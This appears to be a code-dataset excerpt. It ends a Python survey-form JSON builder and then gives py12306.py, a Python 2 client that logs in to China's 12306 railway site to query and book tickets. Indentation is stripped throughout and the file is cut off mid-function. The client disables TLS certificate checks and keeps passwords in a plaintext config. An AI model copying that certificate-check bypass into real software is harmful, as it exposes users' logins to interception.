fecha_nacimiento.addSubType(variable_fecha_nacimiento)
edad_anhos = Category('edad_anhos', 'edad_anios')
variable_edad_anhos = Variable('pos_TL_BR', 'posicion final', None)
edad_anhos.addSubType(variable_edad_anhos)
edad_meses = Category('edad_meses', 'edad_meses')
variable_edad_meses = Variable('pos_TL_BR', 'posicion final', None)
edad_meses.addSubType(variable_edad_meses)
tipo_documento = Category('tipo_documento', 'tipo_documento')
variable_tipo_documento = Variable('pos_TL_BR', 'posicion final', None)
tipo_documento.addSubType(variable_tipo_documento)
numero_documento = Category('numero_documento', 'numero_documento')
variable_numero_documento = Variable('pos_TL_BR', 'posicion final', None)
numero_documento.addSubType(variable_numero_documento)
parentesco_jefe_hogar = Category('parentesco_jefe_hogar', 'parentesco_jefe_hogar')
variable_parentesco_jefe_hogar = Variable('pos_TL_BR', 'posicion final', None)
parentesco_jefe_hogar.addSubType(variable_parentesco_jefe_hogar)
num_nucleo_familiar = Category('num_nucleo_familiar', 'num_nucleo_familiar')
variable_num_nucleo_familiar = Variable('pos_TL_BR', 'posicion final', None)
num_nucleo_familiar.addSubType(variable_num_nucleo_familiar)
sexo = Category('sexo', 'sexo')
variable_sexo = Variable('pos_TL_BR', 'posicion final', None)
sexo.addSubType(variable_sexo)
estado_civil = Category('estado_civil', 'estado_civil')
variable_estado_civil = Variable('pos_TL_BR', 'posicion final', None)
estado_civil.addSubType(variable_estado_civil)
tipo_seguro = Category('tipo_seguro', 'tipo_seguro')
variable_tipo_seguro = Variable('pos_TL_BR', 'posicion final', None)
tipo_seguro.addSubType(variable_tipo_seguro)
lengua_materna = Category('lengua_materna', 'lengua_materna')
variable_lengua_materna = Variable('pos_TL_BR', 'posicion final', None)
lengua_materna.addSubType(variable_lengua_materna)
sabe_leer_escribir = Category('sabe_leer_escribir', 'sabe_leer_escribir')
variable_sabe_leer_escribir = Variable('pos_TL_BR', 'posicion final', None)
sabe_leer_escribir.addSubType(variable_sabe_leer_escribir)
nivel_educativo = Category('nivel_educativo', 'nivel_educativo')
variable_nivel_educativo = Variable('pos_TL_BR', 'posicion final', None)
nivel_educativo.addSubType(variable_nivel_educativo)
ultimo_grado_aprobado = Category('ultimo_grado_aprobado', 'ultimo_grado_aprobado')
variable_ultimo_grado_aprobado = Variable('pos_TL_BR', 'posicion final', None)
ultimo_grado_aprobado.addSubType(variable_ultimo_grado_aprobado)
ultimo_mes_era_un = Category('ultimo_mes_era_un', 'ultimo_mes_era_un')
variable_ultimo_mes_era_un = Variable('pos_TL_BR', 'posicion final', None)
ultimo_mes_era_un.addSubType(variable_ultimo_mes_era_un)
sector_desempenho = Category('sector_desempenho', 'sector_desempenho')
variable_sector_desempenho = Variable('pos_TL_BR', 'posicion final', None)
sector_desempenho.addSubType(variable_sector_desempenho)
presenta_discapacidad = Category('presenta_discapacidad', 'presenta_discapacidad')
variable_presenta_discapacidad = Variable('pos_TL_BR', 'posicion final', None)
presenta_discapacidad.addSubType(variable_presenta_discapacidad)
programa_social_beneficiario = Category('programa_social_beneficiario', 'programa_social_beneficiario')
variable_programa_social_beneficiario = Variable('pos_TL_BR', 'posicion final', None)
programa_social_beneficiario.addSubType(variable_programa_social_beneficiario)
#############
P.addSubType(ap_paterno)
P.addSubType(ap_materno)
P.addSubType(nombres)
P.addSubType(fecha_nacimiento)
P.addSubType(edad_anhos)
P.addSubType(edad_meses)
P.addSubType(tipo_documento)
P.addSubType(numero_documento)
P.addSubType(parentesco_jefe_hogar)
P.addSubType(num_nucleo_familiar)
P.addSubType(sexo)
P.addSubType(estado_civil)
P.addSubType(tipo_seguro)
P.addSubType(lengua_materna)
P.addSubType(sabe_leer_escribir)
P.addSubType(nivel_educativo)
P.addSubType(ultimo_grado_aprobado)
P.addSubType(ultimo_mes_era_un)
P.addSubType(sector_desempenho)
P.addSubType(presenta_discapacidad)
P.addSubType(programa_social_beneficiario)
Page3.addSubType(P)
with open('pagina3.json', 'w') as output:
json.dump(Page3, output, default=jsonDefault, indent=4)
Page3.describe(True) | gpl-3.0 | 2,086,762,254,357,249,800 | 44.237037 | 111 | 0.655748 | false |
huzhifeng/py12306 | py12306.py | 1 | 62739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 标准库
import argparse
import urllib
import time
import datetime
import sys
import re
import ConfigParser
import random
import smtplib
from email.mime.text import MIMEText
# 第三方库
import requests
from huzhifeng import dumpObj, hasKeys
# Set default encoding to utf-8
reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
# 全局变量
RET_OK = 0
RET_ERR = -1
MAX_TRIES = 3
MAX_DAYS = 60
stations = []
seatMaps = [
('1', u'硬座'), # 硬座/无座
('3', u'硬卧'),
('4', u'软卧'),
('7', u'一等软座'),
('8', u'二等软座'),
('9', u'商务座'),
('M', u'一等座'),
('O', u'二等座'),
('B', u'混编硬座'),
('P', u'特等座')
]
# 全局函数
def printDelimiter():
print('-' * 64)
def getTime():
return time.strftime('%Y-%m-%d %X', time.localtime()) # 2014-01-01 12:00:00
def date2UTC(d):
# Convert '2014-01-01' to 'Wed Jan 01 00:00:00 UTC+0800 2014'
t = time.strptime(d, '%Y-%m-%d')
asc = time.asctime(t) # 'Wed Jan 01 00:00:00 2014'
# 'Wed Jan 01 00:00:00 UTC+0800 2014'
return (asc[0:-4] + 'UTC+0800 ' + asc[-4:])
def getCardType(key):
d = {
'1': u'二代身份证',
'2': u'一代身份证',
'C': u'港澳通行证',
'G': u'台湾通行证',
'B': u'护照'
}
return d[key] if key in d else u'未知证件类型'
def getTicketType(key):
d = {
'1': u'成人票',
'2': u'儿童票',
'3': u'学生票',
'4': u'残军票'
}
return d[key] if key in d else u'未知票种'
def getSeatType(key):
d = dict(seatMaps)
return d[key] if key in d else u'未知席别'
def selectSeatType():
key = '1' # 默认硬座
while True:
print(u'请选择席别编码(即左边第一个英文字母):')
for xb in seatMaps:
print(u'%s: %s' % (xb[0], xb[1]))
key = raw_input().upper()
d = dict(seatMaps)
if key in d:
return key
else:
print(u'无效的席别类型!')
def checkDate(date):
m = re.match(r'^\d{4}-\d{2}-\d{2}$', date) # 2014-01-01
if m:
today = datetime.datetime.now()
fmt = '%Y-%m-%d'
today = datetime.datetime.strptime(today.strftime(fmt), fmt)
train_date = datetime.datetime.strptime(m.group(0), fmt)
delta = train_date - today
if delta.days < 0:
print(u'乘车日期%s无效, 只能预订%s以后的车票' % (
train_date.strftime(fmt),
today.strftime(fmt)))
return False
else:
return True
else:
return False
def selectDate():
fmt = '%Y-%m-%d'
week_days = [u'星期一', u'星期二', u'星期三', u'星期四', u'星期五', u'星期六', u'星期天']
now = datetime.datetime.now()
available_date = [(now + datetime.timedelta(days=i)) for i in xrange(MAX_DAYS)]
for i in xrange(0, MAX_DAYS, 2):
print(u'第%2d天: %s(%s)' % (
i + 1, available_date[i].strftime(fmt), week_days[available_date[i].weekday()])),
if i + 1 < MAX_DAYS:
print(u'\t\t第%2d天: %s(%s)' % (
i + 2, available_date[i + 1].strftime(fmt), week_days[available_date[i + 1].weekday()]))
else:
print('')
while True:
print(u'请选择乘车日期(1~%d)' % (MAX_DAYS))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index = int(index)
if index < 1 or index > MAX_DAYS:
print(u'输入的序号无效, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index -= 1
train_date = available_date[index].strftime(fmt)
return train_date
def getStationByName(name):
matched_stations = []
for station in stations:
if (
station['name'] == name
or station['abbr'].find(name.lower()) != -1
or station['pinyin'].find(name.lower()) != -1
or station['pyabbr'].find(name.lower()) != -1):
matched_stations.append(station)
count = len(matched_stations)
if count <= 0:
return None
elif count == 1:
return matched_stations[0]
else:
for i in xrange(0, count):
print(u'%d:\t%s' % (i + 1, matched_stations[i]['name']))
print(u'请选择站点(1~%d)' % (count))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号(1~%d)' % (count))
return None
index = int(index)
if index < 1 or index > count:
print(u'输入的序号无效(1~%d)' % (count))
return None
else:
return matched_stations[index - 1]
def inputStation():
while True:
print(u'支持中文, 拼音和拼音缩写(如: 北京,beijing,bj)')
name = raw_input().decode('gb2312', 'ignore')
station = getStationByName(name)
if station:
return station
else:
print(u'站点错误, 没有站点"%s", 请重新输入.' % (name))
def selectTrain(trains):
trains_num = len(trains)
index = 0
while True: # 必须选择有效的车次
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号,请重新选择车次(1~%d)' % (trains_num))
continue
index = int(index)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
continue
if trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (
trains[index - 1]['queryLeftNewDTO']['station_train_code']))
continue
else:
break
return index
class MyOrder(object):
'''docstring for MyOrder'''
def __init__(
self,
username='',
password='',
train_date='',
from_city_name='',
to_city_name=''):
super(MyOrder, self).__init__()
self.username = username # 账号
self.password = password # 密码
self.train_date = train_date # 乘车日期[2014-01-01]
today = datetime.datetime.now()
self.back_train_date = today.strftime('%Y-%m-%d') # 返程日期[2014-01-01]
self.tour_flag = 'dc' # 单程dc/往返wf
self.purpose_code = 'ADULT' # 成人票
self.from_city_name = from_city_name # 对应查询界面'出发地'输入框中的内容
self.to_city_name = to_city_name # 对应查询界面'目的地'输入框中的内容
self.from_station_telecode = '' # 出发站编码
self.to_station_telecode = '' # 目的站编码
self.passengers = [] # 乘车人列表,最多5人
self.normal_passengers = [] # 我的联系人列表
self.trains = [] # 列车列表, 查询余票后自动更新
self.current_train_index = 0 # 当前选中的列车索引序号
self.captcha = '' # 图片验证码
self.orderId = '' # 订单流水号
self.canWebBuy = False # 可预订
self.notify = {
'mail_enable': 0,
'mail_username': '',
'mail_password': '',
'mail_server': '',
'mail_to': [],
'dates': [],
'trains': [],
'xb': [],
'focus': {}
}
def initSession(self):
self.session = requests.Session()
self.session.headers = {
'Accept': 'application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Host': 'kyfw.12306.cn',
'Connection': 'Keep-Alive'
}
def updateHeaders(self, url):
d = {
'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/login/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
},
'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/loginAysnSuggest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/userLogin': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/index/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/leftTicket/init': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/leftTicket/log?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/query?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/queryT?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/login/checkUser': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/initDc': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Content-Type': 'application/x-www-form-urlencoded',
'Cache-Control': 'no-cache'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'x-requested-with': 'XMLHttpRequest'
},
'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn//payOrder/init?': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/queryOrder/initNoComplete': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn//payOrder/init?random=1417862054369'
},
'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/queryOrder/initNoComplete',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
}
l = [
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&',
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&',
'https://kyfw.12306.cn/otn/leftTicket/log?',
'https://kyfw.12306.cn/otn/leftTicket/query?',
'https://kyfw.12306.cn/otn/leftTicket/queryT?',
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?',
'https://kyfw.12306.cn/otn//payOrder/init?'
]
for s in l:
if url.find(s) == 0:
url = s
if not url in d:
print(u'未知 url: %s' % url)
return RET_ERR
self.session.headers.update({'Referer': d[url]['Referer']})
keys = [
'Referer',
'Cache-Control',
'x-requested-with',
'Content-Type'
]
for key in keys:
if key in d[url]:
self.session.headers.update({key: d[url][key]})
else:
self.session.headers.update({key: None})
def get(self, url):
self.updateHeaders(url)
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.get(url, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def post(self, url, payload):
self.updateHeaders(url)
if url == 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn':
if payload.find('REPEAT_SUBMIT_TOKEN') != -1:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'})
else:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/login/init'})
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.post(url, data=payload, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def getCaptcha(self, url):
self.updateHeaders(url)
r = self.session.get(url, verify=False, stream=True, timeout=16)
with open('captcha.gif', 'wb') as fd:
for chunk in r.iter_content():
fd.write(chunk)
print(u'请输入4位图片验证码(回车刷新验证码):')
captcha = raw_input()
if len(captcha) == 4:
return captcha
elif len(captcha) != 0:
print(u'%s是无效的图片验证码, 必须是4位' % (captcha))
return None
else:
return 1 # 刷新
def initStation(self):
url = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js'
r = self.get(url)
if not r:
print(u'站点数据库初始化失败, 请求异常')
return None
data = r.text
station_list = data.split('@')
if len(station_list) < 1:
print(u'站点数据库初始化失败, 数据异常')
return None
station_list = station_list[1:]
for station in station_list:
items = station.split('|') # bji|北京|BJP|beijing|bj|2
if len(items) < 5:
print(u'忽略无效站点: %s' % (items))
continue
stations.append({'abbr': items[0],
'name': items[1],
'telecode': items[2],
'pinyin': items[3],
'pyabbr': items[4]})
return stations
def readConfig(self, config_file='config.ini'):
cp = ConfigParser.ConfigParser()
try:
cp.readfp(open(config_file, 'r'))
except IOError as e:
print(u'打开配置文件"%s"失败啦, 请先创建或者拷贝一份配置文件config.ini' % (config_file))
raw_input('Press any key to continue')
sys.exit()
self.username = cp.get('login', 'username')
self.password = cp.get('login', 'password')
self.train_date = cp.get('train', 'date')
self.from_city_name = cp.get('train', 'from')
self.to_city_name = cp.get('train', 'to')
self.notify['mail_enable'] = int(cp.get('notify', 'mail_enable'))
self.notify['mail_username'] = cp.get('notify', 'mail_username')
self.notify['mail_password'] = cp.get('notify', 'mail_password')
self.notify['mail_server'] = cp.get('notify', 'mail_server')
self.notify['mail_to'] = cp.get('notify', 'mail_to').split(',')
self.notify['dates'] = cp.get('notify', 'dates').split(',')
self.notify['trains'] = cp.get('notify', 'trains').split(',')
self.notify['xb'] = cp.get('notify', 'xb').split(',')
for t in self.notify['trains']:
self.notify['focus'][t] = self.notify['xb']
# 检查出发站
station = getStationByName(self.from_city_name)
if not station:
print(u'出发站错误, 请重新输入')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
# 检查目的站
station = getStationByName(self.to_city_name)
if not station:
print(u'目的站错误,请重新输入')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
# 检查乘车日期
if not checkDate(self.train_date):
print(u'乘车日期无效, 请重新选择')
self.train_date = selectDate()
# 分析乘客信息
self.passengers = []
index = 1
passenger_sections = ['passenger%d' % (i) for i in xrange(1, 6)]
sections = cp.sections()
for section in passenger_sections:
if section in sections:
passenger = {}
passenger['index'] = index
passenger['name'] = cp.get(section, 'name') # 必选参数
passenger['cardtype'] = cp.get(
section,
'cardtype') if cp.has_option(
section,
'cardtype') else '1' # 证件类型:可选参数,默认值1,即二代身份证
passenger['id'] = cp.get(section, 'id') # 必选参数
passenger['phone'] = cp.get(
section,
'phone') if cp.has_option(
section,
'phone') else '13800138000' # 手机号码
passenger['seattype'] = cp.get(
section,
'seattype') if cp.has_option(
section,
'seattype') else '1' # 席别:可选参数, 默认值1, 即硬座
passenger['tickettype'] = cp.get(
section,
'tickettype') if cp.has_option(
section,
'tickettype') else '1' # 票种:可选参数, 默认值1, 即成人票
self.passengers.append(passenger)
index += 1
def printConfig(self):
printDelimiter()
print(u'订票信息:\n%s\t%s\t%s--->%s' % (
self.username,
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
th = [u'序号', u'姓名', u'证件类型', u'证件号码', u'席别', u'票种']
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
th[0].ljust(2), th[1].ljust(4), th[2].ljust(5),
th[3].ljust(12), th[4].ljust(2), th[5].ljust(3)))
for p in self.passengers:
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
p['index'],
p['name'].decode('utf-8', 'ignore').ljust(4),
getCardType(p['cardtype']).ljust(5),
p['id'].ljust(20),
getSeatType(p['seattype']).ljust(2),
getTicketType(p['tickettype']).ljust(3)))
def checkRandCodeAnsyn(self, module):
d = {
'login': { # 登陆验证码
'rand': 'sjrand',
'referer': 'https://kyfw.12306.cn/otn/login/init'
},
'passenger': { # 订单验证码
'rand': 'randp',
'referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
}
}
if not module in d:
print(u'无效的 module: %s' % (module))
return RET_ERR
tries = 0
while tries < MAX_TRIES:
tries += 1
url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=%s&rand=%s&' % (module, d[module]['rand'])
if tries > 1:
url = '%s%1.16f' % (url, random.random())
print(u'正在等待验证码...')
self.captcha = self.getCaptcha(url)
if not self.captcha:
continue
if self.captcha == 1: # 刷新不计数
tries -= 1
continue
url = 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn'
parameters = [
('randCode', self.captcha),
('rand', d[module]['rand'])
]
if module == 'login':
parameters.append(('randCode_validate', ''))
else:
parameters.append(('_json_att', ''))
parameters.append(('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken))
payload = urllib.urlencode(parameters)
print(u'正在校验验证码...')
r = self.post(url, payload)
if not r:
print(u'校验验证码异常')
continue
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"result":"1","msg":"randCodeRight"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['result', 'msg'])
and (obj['data']['result'] == '1')):
print(u'校验验证码成功')
return RET_OK
else:
print(u'校验验证码失败')
dumpObj(obj)
continue
else:
return RET_ERR
def login(self):
url = 'https://kyfw.12306.cn/otn/login/init'
r = self.get(url)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
if self.session.cookies:
cookies = requests.utils.dict_from_cookiejar(self.session.cookies)
if cookies['JSESSIONID']:
self.jsessionid = cookies['JSESSIONID']
if self.checkRandCodeAnsyn('login') == RET_ERR:
return RET_ERR
print(u'正在登录...')
url = 'https://kyfw.12306.cn/otn/login/loginAysnSuggest'
parameters = [
('loginUserDTO.user_name', self.username),
('userDTO.password', self.password),
('randCode', self.captcha),
('randCode_validate', ''),
#('ODg3NzQ0', 'OTIyNmFhNmQwNmI5ZmQ2OA%3D%3D'),
('myversion', 'undefined')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"loginCheck":"Y"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['loginCheck'])
and (obj['data']['loginCheck'] == 'Y')):
print(u'登陆成功^_^')
url = 'https://kyfw.12306.cn/otn/login/userLogin'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
return RET_OK
else:
print(u'登陆失败啦!重新登陆...')
dumpObj(obj)
return RET_ERR
def getPassengerDTOs(self):
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs'
parameters = [
('', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'获取乘客信息异常')
return RET_ERR
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['normal_passengers'])
and obj['data']['normal_passengers']):
self.normal_passengers = obj['data']['normal_passengers']
return RET_OK
else:
print(u'获取乘客信息失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
if hasKeys(obj, ['data']) and hasKeys(obj['data'], ['exMsg']):
dumpObj(obj['data']['exMsg'])
return RET_ERR
def selectPassengers(self, prompt):
if prompt == 1:
print(u'是否重新选择乘客?(如需选择请输入y或者yes, 默认使用配置文件提供的乘客信息)')
act = raw_input()
act = act.lower()
if act != 'y' and act != 'yes':
self.printConfig()
return RET_OK
if not (self.normal_passengers and len(self.normal_passengers)):
tries = 0
while tries < MAX_TRIES:
tries += 1
if self.getPassengerDTOs() == RET_OK:
break
else:
print(u'获取乘客信息失败次数太多, 使用配置文件提供的乘客信息')
return RET_ERR
num = len(self.normal_passengers)
for i in xrange(0, num):
p = self.normal_passengers[i]
print(u'%d.%s \t' % (i + 1, p['passenger_name'])),
if (i + 1) % 5 == 0:
print('')
while True:
print(u'\n请选择乘车人(最多选择5个, 以逗号隔开, 如:1,2,3,4,5, 直接回车不选择, 使用配置文件中的乘客信息)')
buf = raw_input()
if not buf:
return RET_ERR
pattern = re.compile(r'^[0-9,]*\d$') # 只能输入数字和逗号, 并且必须以数字结束
if pattern.match(buf):
break
else:
print(u'输入格式错误, 只能输入数字和逗号, 并且必须以数字结束, 如:1,2,3,4,5')
ids = buf.split(',')
if not (ids and 1 <= len(ids) <= 5):
return RET_ERR
seattype = selectSeatType()
ids = [int(id) for id in ids]
del self.passengers[:]
for id in ids:
if id < 1 or id > num:
print(u'不存在的联系人, 忽略')
else:
passenger = {}
id = id - 1
passenger['index'] = len(self.passengers) + 1
passenger['name'] = self.normal_passengers[id]['passenger_name']
passenger['cardtype'] = self.normal_passengers[id]['passenger_id_type_code']
passenger['id'] = self.normal_passengers[id]['passenger_id_no']
passenger['phone'] = self.normal_passengers[id]['mobile_no']
passenger['seattype'] = seattype
passenger['tickettype'] = self.normal_passengers[id]['passenger_type']
self.passengers.append(passenger)
self.printConfig()
return RET_OK
def queryTickets(self):
self.canWebBuy = False
url = 'https://kyfw.12306.cn/otn/leftTicket/init'
parameters = [
('_json_att', ''),
('leftTicketDTO.from_station_name', self.from_city_name),
('leftTicketDTO.to_station_name', self.to_city_name),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('leftTicketDTO.train_date', self.train_date),
('back_train_date', self.back_train_date),
('purpose_codes', self.purpose_code),
('pre_step_flag', 'index')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/log?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/queryT?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
return RET_ERR
obj = r.json()
if (hasKeys(obj, ['status', 'httpstatus', 'data']) and len(obj['data'])):
self.trains = obj['data']
return RET_OK
else:
print(u'查询车票失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
return RET_ERR
def sendMailNotification(self):
